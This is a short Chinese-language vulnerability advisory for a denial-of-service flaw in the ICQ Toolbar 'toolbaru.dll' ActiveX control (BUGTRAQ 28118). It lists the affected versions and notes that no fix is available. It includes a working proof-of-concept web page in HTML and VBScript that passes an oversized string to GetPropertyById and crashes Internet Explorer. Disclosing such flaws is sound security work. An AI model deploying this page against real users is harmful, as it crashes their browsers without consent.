BUGTRAQ ID: 28118
CNCAN ID:CNCAN-2008030705
ICQ是一款流行的即时信息通讯程序。
ICQ工具栏'toolbaru.dll' ActiveX控件存在输入检查问题,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。
问题是'toolbaru.dll' ActiveX控件对'GetPropertyById'方法缺少正确处理,构建恶意WEB页,诱使用户访问,可导致对应用程序进行拒绝服务攻击。
测试方法
<!--
Lame ICQToolbar IE DoS - Crash IE and change toolbar color :p
-->
<html>
<object classid='clsid:855F3B16-6D32-4FE6-8A56-BBB695989046' id='toolbar' ></object>
<script language='vbscript'>
bof=String(128, "spdr")
toolbar.GetPropertyById "" ,bof
</script>
</html>
ICQ Inc. ICQ Toolbar 2.3 beta
ICQ Inc. ICQ Toolbar 2.3
目前没有解决方案提供:
<a href=http://www.icq.com/download/toolbar/ target=_blank>http://www.icq.com/download/toolbar/</a>
京公网安备 11010502034610号
暂无评论